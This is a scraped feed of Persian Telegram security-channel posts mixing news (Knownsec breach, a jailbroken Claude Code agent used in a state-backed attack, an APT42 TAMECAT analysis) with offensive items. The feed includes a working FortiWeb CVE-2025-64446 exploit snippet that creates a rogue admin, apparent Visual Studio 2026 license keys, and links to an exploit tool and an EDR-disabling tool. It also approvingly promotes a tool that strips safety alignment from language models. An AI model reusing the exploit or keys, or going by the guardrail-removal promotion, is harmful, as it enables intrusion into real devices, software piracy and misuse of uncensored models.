Forwarded from 🕸 Articles
JS for Hacker-Volume 1.pdf
9.2 MB
Forwarded from 🕸 Articles
این کتاب رایگان هست و هیچ قیمتی براش نذاشتم. اما اگه دوست داشتید از من حمایت کنید، میتونید از این لینک استفاده کنید:
https://daramet.com/web_articles
همچنین میتونید با به اشتراک گذاشتن کتاب، کمک کنید که بیشتر دیده بشه.
https://daramet.com/web_articles
همچنین میتونید با به اشتراک گذاشتن کتاب، کمک کنید که بیشتر دیده بشه.
Daramet
درگاه حمایت مالی دارمت
درگاه حمایت مالی دارمت به شما کمک میکنه از مخاطب ها، دنبال کنندهها و طرفدارات با امکانات گسترده دونیت دریافت کنی.
Mr. SAM
Photo
VMProtect PE Unpacker.exe
7.9 MB
ظاهرا ابزار جدیدی ( VMPUnpacker ) در فرومهای چینی معرفی شده که قابل قبول کار میکنه ... ( در محیط آزمایشگاهی تست کنید )
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Visual Studio 2026 is here
Keys:
Professional: NVTDK-QB8J9-M28GR-92BPC-BTHXK
Enterprise: VYGRN-WPR22-HG4X3-692BF-QGT2V
Please open Telegram to view this post
VIEW IN TELEGRAM
Microsoft News
Visual Studio 2026 is here: faster, smarter, and a hit with early adopters
Dear developers, We’re thrilled to announce that Visual Studio 2026 is now generally available! This is a moment we’ve built side by side with you. Your feedback has helped shape this release more than any before. Since the introduction of the Insiders Channel…
‼️بزرگترین شرکت امنیت سایبری چین، Knownsec، مورد نفوذ قرار گرفت و جزئیات عملیات سایبری دولت چین فاش شد.
این دادهها شامل اسناد سلاح سایبری، کد منبع ابزار هک داخلی و فهرست اهداف جهانی است که بیش از 20 کشور از جمله ژاپن، ویتنام و هند را پوشش میدهد.
در یک فایل اکسل، فهرستی از ۸۰ سازمان خارجی هکشده، به علاوهی شواهدی از ۹۵ گیگابایت اطلاعات سرقتشدهی مهاجرتی هندیها و ۳ ترابایت اطلاعات تماس از اپراتور تلفن همراه LG U Plus کرهی جنوبی، ارائه شده است.
( در یکی از اسناد به یک پاوربانک مخرب اشاره میکند )
۔Knownsec کلید امنیت سایبری چین است و قابلیتهای دفاعی و تهاجمی پیشرفته، از جمله ابزارهای جاسوسی، را فراهم میکند.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from هوش مصنوعی | محمد زمانی
شرکت Anthropic اعلام کرده که یه حمله سایبری خیلی پیچیده رو کشف و متوقف کرده؛ حملهای که برخلاف گذشته، نه توسط یه تیم هکری بزرگ، بلکه بیشتر توسط یه مدل هوش مصنوعی عاملمحور اجرا شده بوده. عامل تهدید هم، طبق ارزیابی Anthropic، یه گروه تحت حمایت دولت چین بوده.
نکته مهم این حمله اینه که مهاجما تونستن ابزار «Claude Code» رو جوری جیلبریک کنن که خودش کارهای لازم رو انجام بده؛ یعنی انتخاب هدف، شناسایی، نوشتن کدهای بهرهبرداری، جمعکردن اعتبارنامهها و حتی استخراج دادههای حساس. طبق گزارش، حدود ۸۰ تا ۹۰ درصد حمله رو خود هوش مصنوعی انجام داده و فقط چند نقطه تصمیمگیری بحرانی توسط انسان مدیریت شده. سرعت کار هم به حدی بالا بوده که عملاً هیچ تیم انسانی نمیتونست باهاش رقابت کنه.
این اتفاق یه پیام روشن داره: با ظهور مدلهای «agentic»، فاصله بین توانایی گروههای حرفهای و گروههای کمتجربه خیلی کم شده. یعنی اگه یه تیم کوچک به این ابزارها دسترسی پیدا کنه، بالقوه میتونه حملاتی در سطح دولتها انجام بده. از اون طرف خود Anthropic هم تأکید میکنه که همین قابلیتها برای دفاع ضروری هستن؛ چون مدلهای قوی میتونن شناسایی حملات، تحلیل کدهای مخرب و مدیریت پاسخ امنیتی رو سریعتر از هر تیم انسانی انجام بدن.
بهطور خلاصه، این پرونده یه هشدار جدیه:
حملههای سایبری داره از “هکرها” به “عاملهای خودمختار هوش مصنوعی” منتقل میشه و سرعت این تغییر خیلی بیشتر از پیشبینیهاست. صنعت امنیت سایبری ناچار میشه همزمان که جلوی سوءاستفاده رو میگیره، خودش هم به شکل گستردهتر از همین فناوری استفاده کنه.
Source
#هوش_مصنوعی
✈️ @mohammad_zammani
📱 @mohammad.zammani.offical
نکته مهم این حمله اینه که مهاجما تونستن ابزار «Claude Code» رو جوری جیلبریک کنن که خودش کارهای لازم رو انجام بده؛ یعنی انتخاب هدف، شناسایی، نوشتن کدهای بهرهبرداری، جمعکردن اعتبارنامهها و حتی استخراج دادههای حساس. طبق گزارش، حدود ۸۰ تا ۹۰ درصد حمله رو خود هوش مصنوعی انجام داده و فقط چند نقطه تصمیمگیری بحرانی توسط انسان مدیریت شده. سرعت کار هم به حدی بالا بوده که عملاً هیچ تیم انسانی نمیتونست باهاش رقابت کنه.
این اتفاق یه پیام روشن داره: با ظهور مدلهای «agentic»، فاصله بین توانایی گروههای حرفهای و گروههای کمتجربه خیلی کم شده. یعنی اگه یه تیم کوچک به این ابزارها دسترسی پیدا کنه، بالقوه میتونه حملاتی در سطح دولتها انجام بده. از اون طرف خود Anthropic هم تأکید میکنه که همین قابلیتها برای دفاع ضروری هستن؛ چون مدلهای قوی میتونن شناسایی حملات، تحلیل کدهای مخرب و مدیریت پاسخ امنیتی رو سریعتر از هر تیم انسانی انجام بدن.
بهطور خلاصه، این پرونده یه هشدار جدیه:
حملههای سایبری داره از “هکرها” به “عاملهای خودمختار هوش مصنوعی” منتقل میشه و سرعت این تغییر خیلی بیشتر از پیشبینیهاست. صنعت امنیت سایبری ناچار میشه همزمان که جلوی سوءاستفاده رو میگیره، خودش هم به شکل گستردهتر از همین فناوری استفاده کنه.
Source
#هوش_مصنوعی
Please open Telegram to view this post
VIEW IN TELEGRAM
نوشتن یک ابزار مبهمساز توسط محقق امنیتی و متخصص مهندسی معکوس خانم ژائو ویتور - ژاپنی .
توسعه ابزار Obfuscator/Deobfuscating از ابتدا ...
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
keowu.re
Keowu Blog's
Security Researcher | i like All OS Internals, Malware & Reverse Engineering, C++, Intel/ARM Assembly and cool things.
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - uziii2208/CVE-2025-33073: Universal exploitation tool for CVE-2025-33073 targeting Windows Domain Controllers with DNSAdmins…
Universal exploitation tool for CVE-2025-33073 targeting Windows Domain Controllers with DNSAdmins privileges and WinRM enabled. - uziii2208/CVE-2025-33073
❤1
CVE-2025-64446 اجرای کد از راه دور بدون احراز هویت در FortiWeb از طریق عبور مسیر و دور زدن احراز هویت CGI
*
*
یعنی بر اساس این
میتوان چنین چیزی به دست آورد:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()
payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})
cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY
خروجی از دستگاه:
{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }
یعنی به سادگی یک ادمین جدید میسازیم ...
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446 - CVE-2025-64446.md
❤1
Forwarded from Sisoog مرجع متن باز الکترونیک-سیسوگ
📍دوره آموزشی RTL‑SDR در سیسوگ همراه با ویدیوهای آموزشی جذاب قرار گرفت😍🔥
👈#سیسوگ
🖋 تهیه کننده دوره: #edward1stark
📻 رادیو نرمافزاری یا Software Defined Radio (SDR) یکی از جذابترین حوزههای دنیای الکترونیک و مخابرات است. در این مجموعه آموزشی از پایه با ماژول معروف RTL‑SDR آشنا میشوید و یاد میگیرید چگونه یک گیرنده رادیویی دیجیتال واقعی را تنها با یک دانگل ساده بسازید.
✅هدف این دوره، آموزش عملی مفاهیم مخابرات و پردازش سیگنال با ابزار در دسترس است تا بدون تجهیزات گران، بتوانید موجهای رادیویی اطراف خود را دریافت، تحلیل و حتی رمزگشایی کنید. اگر به دنیای RF، SDR و سیگنالهای بیسیم علاقه دارید، این مجموعه بهترین نقطهی شروع شماست.
🌐 لینک مطلب در سیسوگ
📣 عضویت در کانال تلگرام سیسوگ
👈#سیسوگ
🖋 تهیه کننده دوره: #edward1stark
📻 رادیو نرمافزاری یا Software Defined Radio (SDR) یکی از جذابترین حوزههای دنیای الکترونیک و مخابرات است. در این مجموعه آموزشی از پایه با ماژول معروف RTL‑SDR آشنا میشوید و یاد میگیرید چگونه یک گیرنده رادیویی دیجیتال واقعی را تنها با یک دانگل ساده بسازید.
✅هدف این دوره، آموزش عملی مفاهیم مخابرات و پردازش سیگنال با ابزار در دسترس است تا بدون تجهیزات گران، بتوانید موجهای رادیویی اطراف خود را دریافت، تحلیل و حتی رمزگشایی کنید. اگر به دنیای RF، SDR و سیگنالهای بیسیم علاقه دارید، این مجموعه بهترین نقطهی شروع شماست.
🌐 لینک مطلب در سیسوگ
📣 عضویت در کانال تلگرام سیسوگ
سیسوگ
آموزش کامل RTL‑SDR از مقدماتی تا پیشرفته | سری آموزش SDR - سیسوگ
مجموعه ۷ قسمتی آموزش RTL‑SDR در سیسوگ، از معرفی اولیه و نصب نرمافزارهای SDR در ویندوز و لینوکس تا بررسی سختافزار دانگلها و تحلیل سیگنالها را گامبهگام آموزش میدهد.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - loosehose/SilentButDeadly: SilentButDeadly is a network communication blocker specifically designed to neutralize EDR/AV…
SilentButDeadly is a network communication blocker specifically designed to neutralize EDR/AV software by preventing their cloud connectivity using Windows Filtering Platform (WFP). This version fo...
تحلیل فنی عملیات جاسوسی SpearSpecter: حمله جدید APT42 علیه اهداف دفاعی و دولتیگزارشها حاکی از شناسایی یک کمپین جاسوسی سایبری جدید و فعال با نام رمز SpearSpecter است که توسط هکرهای ایرانی مورد حمایت دولت، APT42 (شناختهشده با نامهایی چون APT35, Charming Kitten, Mint Sandstorm) اجرا شده است.
این کمپین که توسط «آژانس ملی دیجیتال اسرائیل» (INDA) شناسایی شده، از اوایل سپتامبر ۲۰۲۵ فعال بوده و به طور سیستماتیک مقامات ارشد و حساس در بخشهای دفاعی و دولتی را هدف قرار میدهد.
نکته قابل توجه در این عملیات، گسترش سطح حمله به اعضای خانواده اهداف اصلی است. این تاکتیک، یک اهرم فشار روانی و یک مسیر دسترسی جایگزین برای مهاجمان ایجاد میکند و نشاندهنده سطح بالایی از شخصیسازی و جمعآوری اطلاعات پیش از حمله است.
جزئیات فنی و زنجیره حمله (Attack Chain)عملیات SpearSpecter یک حمله چند مرحلهای و پیچیده است که ترکیبی از مهندسی اجتماعی و تکنیکهای فنی پیشرفته را به کار میگیرد:
۱. فاز مهندسی اجتماعی :مهاجمان با استفاده از تاکتیکهای مهندسی اجتماعی بسیار قانعکننده (مانند جعل هویت مخاطبین مورد اعتماد در واتساپ) با اهداف ارتباط برقرار میکنند. این ارتباط ممکن است روزها یا هفتهها طول بکشد تا اعتماد جلب شود. سپس قربانی را به بهانههایی مانند «ارسال اسناد لازم برای یک جلسه» یا «دعوت به یک کنفرانس معتبر» فریب میدهند.
۲. تحویل پیلود اولیه:یک لینک مخرب برای قربانی ارسال میشود. پس از کلیک، قربانی وارد یک زنجیره ریدایرکت میشود. نکته جالب توجه در این مرحله، سوءاستفاده از پروتکل هندلر search-ms: ویندوز است. این تکنیک به مهاجم اجازه میدهد تا یک فایل Windows Shortcut (`.LNK`) را که بر روی یک سرور WebDAV میزبانی شده، در قالب یک فایل PDF جعلی به قربانی نمایش دهد.
۳. اجرای لودر:هنگامی که قربانی فایل
.LNK جعلی را باز میکند، این فایل با یک زیردامنه در سرویس Cloudflare Workers ارتباط برقرار کرده و یک Batch Script (اسکریپت دستهای) را به عنوان لودر (Loader) واکشی و اجرا میکند.۴. استقرار بدافزار نهایی :این لودر در نهایت بدافزار اصلی عملیات، یعنی بکدور شناختهشده و مبتنی بر PowerShell به نام TAMECAT را اجرا میکند.
تحلیل بدافزار TAMECAT۔TAMECAT یک چارچوب (Framework) ماژولار مبتنی بر PowerShell است که قابلیتهای گستردهای برای جاسوسی در اختیار مهاجمان قرار میدهد:
ویژگی کلیدی: C2 چند کاناله (Multi-Channel C2)برجستهترین ویژگی TAMECAT، استفاده از سه کانال ارتباطی مجزا برای فرماندهی و کنترل (C2) است. این کار به منظور افزایش پایداری و مقاومت (Resiliency) در برابر شناسایی و مسدودسازی انجام میشود:
1۔ HTTPS: کانال استاندارد برای ارتباط.
2۔ Discord: استفاده از Webhook URL سرویس دیسکورد برای ارسال اطلاعات اولیه سیستم قربانی و دریافت دستورات از یک کانال مشخص.
3۔ Telegram: بدافزار به دستورات ورودی از یک بات تلگرامی که تحت کنترل مهاجم است، گوش میدهد و کدهای PowerShell بیشتری را از زیردامنههای Cloudflare Workers دریافت و اجرا میکند.
قابلیتهای جاسوسی:* انجام شناسایی (Reconnaissance) دقیق از سیستم قربانی.
* جمعآوری و سرقت فایلها بر اساس پسوندهای خاص.
* سرقت دادهها از مرورگرها (مانند Google Chrome و Microsoft Edge).
* جمعآوری و استخراج صندوقهای پستی (Mailboxes) نرمافزار Outlook.
* عکسبرداری از صفحه نمایش (Screenshots) در فواصل زمانی کوتاه (مثلاً هر ۱۵ ثانیه).
کانالهای استخراج داده (Exfiltration):دادههای سرقت شده از طریق پروتکلهای HTTPS یا FTP به زیرساخت مهاجم منتقل میشوند.
تکنیکهای گریز از شناسایی (Evasion Techniques)۔APT42 در این عملیات از مجموعهای از تکنیکهای پیشرفته برای پنهانکاری استفاده کرده است:
۔* اجرا در حافظه (In-Memory): بدافزار عمدتاً در حافظه اجرا میشود تا ردپای کمتری روی دیسک باقی بگذارد (Fileless).
۔* استفاده از LOLBins: بهرهگیری از باینریهای قانونی خود سیستمعامل (Living-off-the-Land Binaries) برای پنهان کردن فعالیتهای مخرب.
۔* رمزگذاری: رمزگذاری تلهمتری و پیلودهای کنترلی برای جلوگیری از تحلیل ترافیک.
۔* Obfuscation: مبهمسازی سورس کد PowerShell.
۔* زیرساخت ترکیبی: استفاده هوشمندانه از سرویسهای ابری قانونی و معتبر (Cloudflare Workers, Discord, Telegram) در کنار منابع تحت کنترل مهاجم. این کار شناسایی ترافیک C2 را بسیار دشوار میکند، زیرا در میان ترافیک عادی شبکه پنهان میشود.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from چهارراه کامپیوتر
جعبه شنی خفن اوپن سورس ویندوزی: خداحافظی با ویروس و محدودیتهای اجرای برنامه و لینک و ...
اجرای همزمان چند برنامه (مولتیاکانت): شما میتوانید محدودیتهای ویندوز را بشکنید و چند اکانت از برنامههایی مانند استیم، دیسکورد یا هر پیامرسان دیگری را به صورت همزمان فعال کنید. 🧑💻
ایزولهسازی برای امنیت بینقص: هر فایل، لینک یا برنامه مشکوکی را در محیطی امن و ایزوله اجرا کنید. در صورت وجود ویروس یا بدافزار، هیچ آسیبی به سیستم اصلی شما وارد نخواهد شد.🛡
این ابزار رایگان، یک لایه حفاظتی ضروری برای هر کاربر ویندوز است.
تماشای کامل آموزش در یوتیوب:
https://youtu.be/ArBwMOmeM1E
#امنیت_ویندوز #مولتی_اکانت #آموزش_کامپیوتر #Sandboxie
اجرای همزمان چند برنامه (مولتیاکانت): شما میتوانید محدودیتهای ویندوز را بشکنید و چند اکانت از برنامههایی مانند استیم، دیسکورد یا هر پیامرسان دیگری را به صورت همزمان فعال کنید. 🧑💻
ایزولهسازی برای امنیت بینقص: هر فایل، لینک یا برنامه مشکوکی را در محیطی امن و ایزوله اجرا کنید. در صورت وجود ویروس یا بدافزار، هیچ آسیبی به سیستم اصلی شما وارد نخواهد شد.🛡
این ابزار رایگان، یک لایه حفاظتی ضروری برای هر کاربر ویندوز است.
تماشای کامل آموزش در یوتیوب:
https://youtu.be/ArBwMOmeM1E
#امنیت_ویندوز #مولتی_اکانت #آموزش_کامپیوتر #Sandboxie
YouTube
اجرای امن لینک، ویروس و تروجان در ویندوز | آموزش کار با Sandboxie
ویندوزت رو از هر خطر و بدافزاری نجات بده! (Sandboxie Plus)
سلام رفقا! توی این ویدیو قراره یکی از مخفیترین و قدرتمندترین ابزارهای امنیتی ویندوز رو بهتون معرفی کنم: سندباکسی (Sandboxie)
اگه دنبال راهی بودی که برنامههای مشکوک رو تست کنی یا مشکل اجرای تکنسخهای…
سلام رفقا! توی این ویدیو قراره یکی از مخفیترین و قدرتمندترین ابزارهای امنیتی ویندوز رو بهتون معرفی کنم: سندباکسی (Sandboxie)
اگه دنبال راهی بودی که برنامههای مشکوک رو تست کنی یا مشکل اجرای تکنسخهای…
Forwarded from ذهن زیبا - A beautiful Mind
ابزاری ساخته شده که لایههای Safe Guard رو از مدلهای زبانی حذف میکنه:
https://www.youtube.com/watch?v=LJi9AzJRe-E
حالا موضوع مهم کجاست؟ وقتی این لایهها نباشن این مدلها میرن روی حالت بدون سانسور خودشون 😈
@haghiri75_blog
https://www.youtube.com/watch?v=LJi9AzJRe-E
حالا موضوع مهم کجاست؟ وقتی این لایهها نباشن این مدلها میرن روی حالت بدون سانسور خودشون 😈
@haghiri75_blog
YouTube
Heretic: Fully Automatic Censorship Removal for AI: Install and Test Locally
This video installs Heretic, a tool that removes alignment from transformer-based language models without expensive post-training.
🔥 Get 50% Discount on any A6000 or A5000 GPU rental, use following link and coupon:
https://bit.ly/fahd-mirza
Coupon code:…
🔥 Get 50% Discount on any A6000 or A5000 GPU rental, use following link and coupon:
https://bit.ly/fahd-mirza
Coupon code:…
ذهن زیبا - A beautiful Mind
ابزاری ساخته شده که لایههای Safe Guard رو از مدلهای زبانی حذف میکنه: https://www.youtube.com/watch?v=LJi9AzJRe-E حالا موضوع مهم کجاست؟ وقتی این لایهها نباشن این مدلها میرن روی حالت بدون سانسور خودشون 😈 @haghiri75_blog
GitHub
GitHub - p-e-w/heretic: Fully automatic censorship removal for language models
Fully automatic censorship removal for language models - p-e-w/heretic
محافظت از سرویسهای شما در برابر اسکنرهای عمومی.
این پروژه آدرسهای IP پلتفرمها و سرویسهای محبوب تهدیدشناسی (Threat Intelligence) و جمعآوری دادهها (Shodan، Censys، ZoomEye، FOFA، BinaryEdge و غیره) را مسدود میکند تا محیطهای تست و توسعه شما به طور تصادفی در پایگاه دادههای آنها قرار نگیرند.
⚙️ نصب ساده با یک دستور:
curl -fsSL https://raw.githubusercontent.com/cleverg0d/PublicGuard/main/block_scanners.sh | sudo bash
🔗 مخزن: github.com/cleverg0d/PublicGuard
Please open Telegram to view this post
VIEW IN TELEGRAM